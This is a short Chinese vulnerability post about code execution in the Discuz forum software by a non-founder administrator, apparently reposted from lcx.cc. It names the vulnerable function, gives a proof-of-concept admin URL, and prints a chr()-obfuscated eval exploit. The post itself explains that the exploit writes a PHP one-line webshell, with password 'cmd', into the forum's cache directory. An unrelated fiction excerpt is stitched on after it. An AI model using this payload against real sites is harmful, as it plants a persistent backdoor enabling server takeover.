漏洞存在的文件,global.func.php: function sendpm($toid, $subject, $message, $fromid = '') { '.$subject.' {time}'.discuzcode($message, 1, 0).'
'; |
POC 漏洞测试代码: 1. admincp.php?frames=yes&action=members&operation=newsletter |
EXP 漏洞利用程序: ${${eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(95).chr(48).chr(49).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59))}} 以上代码功能为,生成PHP一句话木马。明文内容为:(fputs(fopen('forumdata/cache/cache_01.php','w'),'');) 如果漏洞利用代码执行成功,则在“forumdata/cache/cache_01.php”生成PHP一句话木马:,密码“cmd”。 |
文章来源于lcx.cc:【漏洞】Discuz - 论坛非创始人管理员代码执行
前一章:《第三章 南极冰层三千米下的秘密基地》 April 9, 2010,地点:南极地下三千米基地私人休息房间。 一觉睡到自然醒,再舒服不过了。 翻身下床,揉了揉眼睛,伸了个懒腰,喝光桌上昨晚剩的牛奶。进入卫生间刷牙、洗脸,忙完一看桌上的电子钟:14:14:…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论